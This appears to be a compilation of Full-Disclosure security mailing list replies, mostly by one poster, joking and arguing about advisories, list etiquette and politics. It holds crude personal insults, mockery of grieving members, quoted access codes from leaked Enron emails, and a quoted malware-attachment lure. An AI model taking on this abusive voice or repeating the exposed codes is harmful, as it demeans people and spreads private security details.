>> The threat seems largely theoretical. But a team of computer security researchers plans to report Wednesday that it had been able to gain wireless access to a combination heart defibrillator and pacemaker. They were able to reprogram it to shut down and to deliver jolts of electricity that would potentially be fatal . if the device had been in a person. In this case, the researchers were hacking into a device in a laboratory.

When I got my pacemaker I was working on some RF programming project. My doctor told me to find another job, he could sense my curiosity. Who could resist such fun?!

Randy
Re: [Full-disclosure] Dude VanWinkle's Death
I always think of these pics when those precious snowflakes post nonsense:

http://i118.photobucket.com/albums/o100/EMPulse_of_KC/itg_quarterly.jpg
http://www.stevelambe.com/posts/Nerd.jpg
http://www.encyclopediadramatica.com/images/8/88/Itg.jpg

Attention whores, the lot of them. Par for the course...

On Mon, February 11, 2008 2:51 pm, Geoffrey Gowey wrote:
> I can't even believe some of the people on this list would take this posting as a joke. This could have been any of us. Disagreeing about a person's opinion and discussing is part of being on this list, but it's something else entirely when, solely based on what they voiced on a professional mailing list about professional topics, some of the members are rejoicing. Now that is just purely tasteless and cold hearted. I guess the fact that these people who are rejoicing are the same group that hide behind anonymous mail just goes to show that keyboard bravery really can separate a person from their humanity.
> For those of you keyboard warriors who may disagree with some of the people here and voice your disagreement in a manner befitting a toddler I normally chalk up your nonsense to immaturity, but celebrating the death of someone who maintained his professionalism is inhuman. It has been par for the course for years to have a heavy helping of nonsense come from those who would hide their identity not for professional reasons, but for them to act out what Freud defined as their Id. This topic, however, shows these same bunch of people for what they truly are: self-serving immature cowards.
> I never really knew this person while he was alive and I am not trying to paint a picture of him as a saint, but for the immature lot on this list now would be a good time to know when to refrain from your impulse of banging out some immature posting. Show some small measure of humanity and let those affected who knew this person grieve without your antics.
>
> On Feb 11, 2008 7:40 AM, Jonathan Glass [EMAIL PROTECTED] wrote:
>> http://www.timesreporter.com/index.php?ID=79446&r=6&Category=7
>> Justin Marcus Polazzo, 31, of Atlanta, Ga., was found dead in his home on Feb. 4, 2008. He was born in Alma, Mich., on Dec. 31, 1976. At the time of his death, Justin was employed at the Georgia Institute of Technology's Office of Information Technology in the Division of Architecture and Infrastructure. Justin is survived by his parents, mother Carol Anson Stanwyck (Doug), and father Free Polazzo (Janet), brother Chad Polazzo (Lori), and stepsister Liz Stanwyck. Other area surviving relatives are Betty Anson, Wendy (Wagner) Muzechuk, Ashley and Maggie Haverfield and James Anson (Marilyn) from Illinois. A memorial service will be held Sunday, Feb. 10, 2008, in Atlanta.
>> It's been a sad week for the friends of Dude VanWinkle.
>> --JG
Re: [Full-disclosure] [FDSA] Notepad Highly Critical Cross-Site Scripting (XSS) Vulnerability
> Fredrick Diggle Security Advisory
> Application: Notepad
> Versions: 5.1.2600.2180 verified to be vulnerable
> Platforms: Microsoft Windows (All Versions)
> Bugs: Cross Site Scripting (XSS)
> Severity: Critically High
> Date: 17 Jan 2008
> Credit: Estr Hinan
> ###
> That’s a really funny “security risk”. I don’t agree with you, because otherwise every editor, which is able to save HTML Files, is a security problem. So vi, Dreamweaver, emacs… are all unsecure? It is your decision, to open a HTML file or not. And (if here are some MS guys) please don’t fix this “issue”, because sometimes, if you haven’t a professional tool at the moment, the Windows editor can be useful, too. Also, if you need to edit some small Scripts.
> Yours, SR

Speaking of professional tools... Let's hope this was just a language translation error and not a fully understood response.

Lighten up, folks.
[Full-disclosure] Was secreview crap - now OpenVMS!!
[EMAIL PROTECTED] said:
> Bonus points for knowing that VMS was mostly written in Bliss/32 or some such, and VM and MVS were a mixture of assembler and (later on) PL/S. No C knowledge needed for those critters...

OpenVMS is less than 40% Blissful... though I'm not familiar with the original source (wasn't it written on stone tablets?). About 50% is C, with a healthy mix of obsoletes making the difference. How something so elegant could be spawned from such chaos is beyond me. Mostly, the VMS basic OS utilities are Bliss-based (think: GNU).

I really wish HP would open OpenVMS before they kill it.

Security relevance: UNHACKABLE! grin

Randy
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
> snip hack snip snip
> QuiteMove
> http://www.quitemove.com
> QuietMove
> snip snip hack snip

A tad more attention to details would be nice. Good thing you're not graded on spelling here. C-.

Happy New Year,

Randy
Re: [Full-disclosure] Security contact in att
minor float wrote:
> hi
> has anybody security contact in att?

http://www.nsa.gov/contacts/index.cfm
Re: [Full-disclosure] Am I missing anything ?
http://uncyclopedia.org/wiki/Pot_v._Kettle

Kradorex Xeron wrote:
> Simon and Joey,
> Your comments are not contributing anything of value to the list and are causing the SNR of the list to go down. I strongly suggest for you to both take your personal banter off-list. I suspect that the rest of the list does not want to hear your personal banter toward each other. This is a security list, not a space for your personal bickering. Grow up.
>
> On Monday 23 July 2007 18:48, Simon Smith wrote:
>> Right kid... Can we also agree that you are immature? I mean, we can't lay this to rest unless we come to a compromise. Frankly, I don't feel that it would be a compromise if you didn't come half way in this relationship. While we're at it... Let's also agree that you're a coward, probably fat and lethargic... With no real friends... Who never really gets laid? Yeah I think that about sums it up... ;]
>>
>> On 7/23/07 6:40 PM, Joey Mengele [EMAIL PROTECTED] wrote:
>>> No, I forgot. I now remember, thank you. As long as we agree that you were wrong, I was right, and you are an ignorant jackass who may or may not have had sexual relations with the Oreo named KF, I see no need for this thread to continue.
>>> J
>>>
>>> On Mon, 23 Jul 2007 18:38:45 -0400 Simon Smith [EMAIL PROTECTED] wrote:
>>>> You are right with respect to your RFI comment... But as far as me learning anything, don't count on it. I am after all an ignorant jackass remember?
>>>> SNIP
Re: [Full-disclosure] Macro threats
Muscarella, Sebastian (IT) wrote:
> snip
> NOTICE: If received in error, please destroy and notify sender. Sender does not intend to waive confidentiality or privilege. Use of this email is prohibited when received in error.

1. Shouldn't I destroy the sender *after* notifying him?
2. You may not intend to waive confidentiality or privilege, but you did.
3. You can't prohibit what I do with this email. It is mine now. Moohahaha!

Seriously. These tags piss me off. There is no legal justification. It just makes the company's admins look like uneducated asses. I encourage all organizations to accept the fact that your emails are community property once you hit send. There is no e-mail Postal police nor should there be. Encrypt everything.

Randy
Re: [Full-disclosure] The Cyber war on Iran
Paul Schmehl wrote:
> SNIP
> You seem to be living under the delusion that your actions can somehow influence the extremists. There's only two actions that will influence the extremists in any way and that is to kill or imprison them. Anything else you might try, like trying to make nice with them or negotiate with them, is a complete waste of time and merely hastens your own death or imprisonment.

I can't believe you made a public statement about killing or imprisoning Mr. Bush. Of course, along with a few dozen of his hench(wo)men as well. Be careful, they'll send you to another country to torture you. Or is that even necessary now since he's wiped his ass with our Constitution?

Randy
Re: [Full-disclosure] Simcard 0day.
Blue Boar wrote:
> dfklsddshd wrote:
>> 1. Open attachment.
> Does this actually work on people on a security mailing list?
> BB
>> Complete scanning result of Simcard.com, received in VirusTotal at 01.02.2007, 02:38:58 (CET).
>> SNIP

you would be quite surprised, i'm sure.

randy
Re: [Full-disclosure] EEYE: Intel Network Adapter Driver Local Privilege Escalation
Josh Bressers wrote:
>> eEye Research - http://research.eeye.com
>> Intel Network Adapter Driver Local Privilege Escalation
>> Release Date: December 7, 2006
>> Date Reported: July 10, 2006
>> Severity: Medium (Local Privilege Escalation to Kernel)
>> Systems Affected:
>> Windows 2000, XP, 2003, Vista
>> Intel PRO 10/100 - 8.0.27.0 or previous
>> Intel PRO/1000 - 8.7.1.0 or previous
>> Intel PRO/1000 PCI - 9.1.30.0 or previous
>> Linux
>> Intel PRO 10/100 - 3.5.14 or previous
>> Intel PRO/1000 - 7.2.7 or previous
>> Intel PRO/10GbE - 1.0.109 or previous
>> UnixWare/SCO6
>> Intel PRO 10/100 - 4.0.3 or previous
>> Intel PRO/1000 - 9.0.15 or previous
> It's worth noting that this advisory is misleading. This flaw does not affect the Linux drivers. The Linux drivers do not support the NDIS API and the OID concept that Windows does.

Thanks for the confirmation... I thought I had gone mad for a bit there. It just didn't sound right. The version numbers threw me off. Does anyone know how these specific Linux driver version numbers were determined?

Randy
Re: [Full-disclosure] Enron Mail archive..... oops
Thierry Zoller wrote:
> Dear List,
> Search the Enron mail archives, for example Password :
> http://enron.trampolinesystems.com/search/FBI#focus=/search/password
> I hope this code was changed:
> * Aspen Security Codes
> Email details
> From: Sally Keepers
> To: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], Kenneth Lay (hide last 2)
> Sent: 19/09/2000 at 11:26
> Email metadata
> Themes:
> The message
> Per Margie, the access code for the #2 house is 2001, for the #3 house it is 20011.
> *

So many interesting emails to waste valuable time reading :-)

Randy
[Full-disclosure] [OT for crybaby list-nazis] blah blah now D.O.A.P.
William Lefkovics wrote:
> Tangential to this discussion is the no doubt (to be) controversial UK film D.O.A.P. soon to be screening in Toronto.
> http://www.e.bell.ca/filmfest/2006/media_centre/news_releaseItem.asp?id=261
> It's a docu-drama of the possible ramifications following the fictitious assassination of George Bush in Chicago in 2007.
> Is it the London Bridge you have for sale?

I'm guessing it ends with the world exploding. Because the only thing worse than the asshat we now have at the wheel here (USA) would be Cheney steering us into an iceberg. (Trivia! Cheney and I have the same cardiologist... WTF)

Politics aside, I like movies that stir the pot. It could be interesting.

As for the bridge... sure, L.B. works. We may have a buyer from Dallas ;-)

Randy
Re: [Full-disclosure] Re: George Bush appoints a 9 year old to... blah blah blah
Paul Schmehl wrote:
> --On Tuesday, August 29, 2006 17:34:24 -0400 [EMAIL PROTECTED] wrote:
>> On Tue, 29 Aug 2006 14:55:09 CDT, Paul Schmehl said:
>>>> 1] Hezbollah has managed to become an important presence in the Lebanese Parliament
>>> They just left out - by killing opposition leaders and threatening others.
>> Like your government doesn't do that too?
> Uhright.

Wow. I have a bridge for sale... interested?

Is there a library at your school? Stop by sometime.
Re: [Full-disclosure] IBM to buy ISS
Mike Owen wrote:
> Sounds like IBM is going to buy out ISS. Having too much experience in dealing with IBM contractors and support, I don't think this is a good thing for ISS or their customers.
> http://www.iss.net/about/press_center/releases/us_ibm_08233006.html

You would think IBM would try and add a security company to their ranks. It is definitely something they should consider, rather than expanding their waistline with bloatware.

Randy
Re: [Full-disclosure] Tempest today
[EMAIL PROTECTED] wrote:
> On Sat, 19 Aug 2006 18:49:09 -0500 Bipin Gautam [EMAIL PROTECTED] wrote:
>> Ok, here is something from the book that I was trying to assemble/write.
>> Some Links:
>> http://www.eskimo.com/~joelm/tempest.html
>> http://www.erikyyy.de/tempest/
>> Lets begin
>> SNIP SNIP SNIP
> Please help make the list self-policing. Follow the list charter and note that self-promotion is forbidden.

Please don't quote the entire message in your response if you have nothing useful to add.
Re: [Full-disclosure] PassMark?
Gary E. Miller wrote:
> Yo All!
> I thought I'd actually risk a real security question here. Any one seen the PassMark (www.passmarksecurity.com) security system in action?

Yes. Bank of Bangalore^H^H^H^H^H^H^H^H^HAmerica uses it, as well as a recent financial client corp. of mine. I'm not impressed with it.

Randy
Re: [Full-disclosure] Tool Release - Tor Blocker
Jason Areff wrote:
> Those acronyms prove that I know more than you apparently. Way to demonstrate your l33t hax0r skills.
> Jason Areff
> CISSP, A+, MCSE, Security+ == Better than Steven Rakick

I haven't heard someone brag about an MCSE in almost a decade. The + ones are just pay to have. Even I have a CISSP. It just took people a couple years to figure out how to hack that test (aka READ a study guide).

I'm sorry, but as someone with letters and crap as well, I must say I like to save them for the resume and job/contract hunting. Managers care. People that actually play in this sandbox of ours don't.

Randy
Re: [Full-disclosure] Full Disclosure Code of conduct
Aaron Gray wrote:
> I am suggesting that we all cooperate and produce a Code of Conduct for participating on the Full Disclosure mailing list.
> Suggested start :-
> 1) No Swearing
> 2) No slagging others off
> 3) No selling of exploits and vulnerabilities
> 4) Rename it SecurityFocus FD

Your number 2 is half the fun of this list. It makes people think twice before posting something senseless. Though it isn't 100% effective, it is better than having a paid moderator deleting messages.

Put in a swear filter. Net Nanny or something.

I do appreciate your goal, however, this is a dirty and nasty arena. It was designed to be an alternative to the cleansed and censored corporate controlled lists. I must say, FD is still friendlier than the underground BBSs of the 80's & 90's. Good times.

Randal T. Rioux | Procyon Labs
IT Security R&D and Consulting
Virtual: www.procyonlabs.com
Physical: DC / Baltimore
PGP: gpg --keyserver pgp.mit.edu --recv-keys 0xD08D1941
Re: [Full-disclosure] IE7 Zero Day
[EMAIL PROTECTED] wrote:
> If you are interested in bidding. I can provide you with an account to provide the funds. Social Security numbers are for American citizens only so don't assume I am such a person.

I'll start the bidding at $1.25 USD. Do you take checks? I have a slightly used half-liter bottle of Mountain Dew for trade if you're willing to barter. Let me know... I'm serious.

Randy

PS I found that the rotors on my Jeep wear down faster than they should. Does anyone know a contact at Daimler/Chrysler that would be interested in buying this vulnerability information? I don't have a fix yet though.
Re: [Full-disclosure] security at .edus
Brian Eaton wrote:
> On 4/22/06, Sol Invictus [EMAIL PROTECTED] wrote:
>> What you don't realize is that just by posting here that an Educational Institution is vulnerable to this, Some Readers (not me) might already be scanning for web vulnerabilities at these sites across the US.
> I suspect the anonymous educational institution in question is hardly the only vulnerable site out there. Universities tend to be fairly decentralized places, where academic freedom can count for a lot more than a secure network. Plus a university network has fewer secrets to protect than a business.

Tell that to the DoD sponsored research labs within many universities.

Randy
Re: [Full-disclosure] Google Groups e-mail disclosure in plain text
Rodrigo Barbosa wrote:
> On Wed, Apr 19, 2006 at 07:09:11AM +0100, n3td3v wrote:
>> On 4/19/06, Randal T. Rioux [EMAIL PROTECTED] wrote:
>>> I don't think the industry needs someone to verify an advisory for them.
> Actually, you are wrong there. More than one company pays mine to do just that. The volume of information contained and the huge number of advisories can cost companies some big bucks. Then again, my company states pretty clearly on all contracts that we will only filter and analyse the advisories, not produce original ones.
> As for Secunia, I really can't comment.

Fix your quoter. I didn't write that. n3td3v did.

Randy
Re: [Full-disclosure] Google Groups e-mail disclosure in plain text
n3td3v wrote:
> If they did something special with their website like Securityfocus does, then I might be able to bear their illegal footer message spam, and their scene whore republication of advisories they claim are Secunia exclusives.

What does SF offer? Stale news and constant subliminal ads for Symantec products? Google ads *vomit*? An abysmal mailing list moderated by a cat sleeping on the delete button?

I don't care what is on Secunia's site or what they do. They let everyone bitch, fight and we're better with it than without.

You're here. You must get something out of it to stay. I hate the Bush regime - but I'm not moving to Canada!

Randy
Re: [Full-disclosure] Noise
No. He needs to disconnect from AOL because his sister needs the phone and his mom just yelled to him in the basement to come up for dinner.

php0t wrote:
> You need a hug.
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
> Sent: Thursday, March 30, 2006 12:57 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Noise
>
> I finished school 11 years ago, in fact I left on my own accordance (when I was 14) because they were going to chuck me out of school anyway. I soon got involved in stealing cars, breaking into houses, and taking goods from shops. All my criminal friends went to jail, I was the only one left. I started using computers to pass the time (when I was 18) when having no one left to hang about with, and I used my knowledge of criminality to work out the bad guys at Yahoo. I then met an employee (who will remain unnamed) to act as an informant for Yahoo. I then started to find my own vulnerabilities to Yahoo, which I reported to them. They started disrespecting me, I setup my own security group to show them that I could be a match against them and continue to compromise their systems. I then went on a public crusade to tell the public all about their flaws that I had been keeping secret for years. Their employees who thought were befriending me to keep in tap with info I had were told finally to f*** off just last week, and now there is no connection between n3td3v and the yahoo security team, in fact, I mailed the official address and told them I wouldn't be mailing them ever again. And that's the current situation, up to date. Seiden at yahoo (security consultant/advisor/hacker) whatever you want to call him is now pissed off because he's getting no info feed into his corporate security team anymore... and the consultants and engineers who had opened dialog with me are now sitting in paranoia.
Re: [Full-disclosure] Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
Gadi Evron wrote:
> snip.cut.hack of security attitude
> I wonder why anybody believes OpenBSD is the most secure OS around.

No - that would be OpenVMS duck! :-)

At least until HP kills it.

Randy
still wondering what is 'open' about VMS
Re: [Full-disclosure] Fwd: SURROUNDED / SF Symantec
Javor Ninov wrote:
> do you realize that your so-called popularity is based on the fact that FD is not moderated ? strange .. i don't see you on securityfocus.com
>
> n3td3v wrote:
>> No THINK required, IS BIG, FACT.

Not to defend the mighty 'd3v, but securityfocus.com, aka Symantec, is trash. They delete any posting to any of their owned lists that say even the slightest bad thing about any of their weak products. Despite the trolls, FD is the last great pasture of free security discussion. The securityfocus lists are for clueless management types looking to pick up buzzwords for their next big useless presentation to the CEOs.

Randy
Re: [Full-disclosure] Re: Reported Google Vuln
Dave Korn wrote:
> nodialtone wrote:
>> Google funzies.
>> [Snip]
>> Reference: http://seclists.org/lists/fulldisclosure/2006/Feb/0553.html
> Ok, I give up. Why are you posting a report to the full-disclosure list to announce a post that was posted to... the full-disclosure list? Is this some kind of mail-loop joke?
> cheers,
> DaveK

my head just exploded. guts hurt from laughing. thanks dave.

the dreaded fibonacci vulnerability!! it gets worse with each posting! ahh!

time for sleep...

randy